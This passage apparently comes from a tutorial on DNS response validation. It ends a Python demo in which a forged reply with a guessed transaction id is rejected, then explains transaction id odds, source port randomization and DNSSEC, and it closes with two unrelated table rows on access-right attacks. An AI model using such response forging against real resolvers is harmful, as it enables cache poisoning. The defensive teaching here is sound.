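    forged = build_response(0x1235, "www.example.com", "203.0.113.66")   # attacker guessed wrong
    print(validate_response(query, genuine), first_a_record(genuine))
    print(validate_response(query, forged))
```

The transaction id alone gives the forger a 1 in 65536 chance per attempt; resolvers also randomize the UDP source port so the forger must guess that too, and DNSSEC validation rejects a forged record outright.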
access right attacks | privilege escalation |
access right attacks | transitive access |